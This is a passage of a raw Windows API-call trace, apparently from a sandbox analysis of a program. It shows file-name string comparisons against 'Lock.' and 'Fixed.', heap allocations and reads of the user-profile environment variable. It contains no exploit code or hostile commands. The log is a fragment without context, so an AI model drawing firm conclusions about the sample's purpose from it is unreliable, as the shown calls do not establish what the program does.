lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D4ykVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4ykVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ykVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0220.105] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0220.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69700 [0220.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qf_lD4ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f_lD4ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_lD4ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lD4ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D4ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ykVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kVY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VY6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73840 [0220.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73840 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0220.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.107] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0220.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0220.107] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0220.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0220.108] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0220.108] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0220.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0220.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0220.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0220.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b78 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0220.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0220.110] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.110] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0220.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854920 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0220.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0220.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0220.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0220.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0220.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0220.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0220.113] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0220.113] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.113] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.113] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.114] 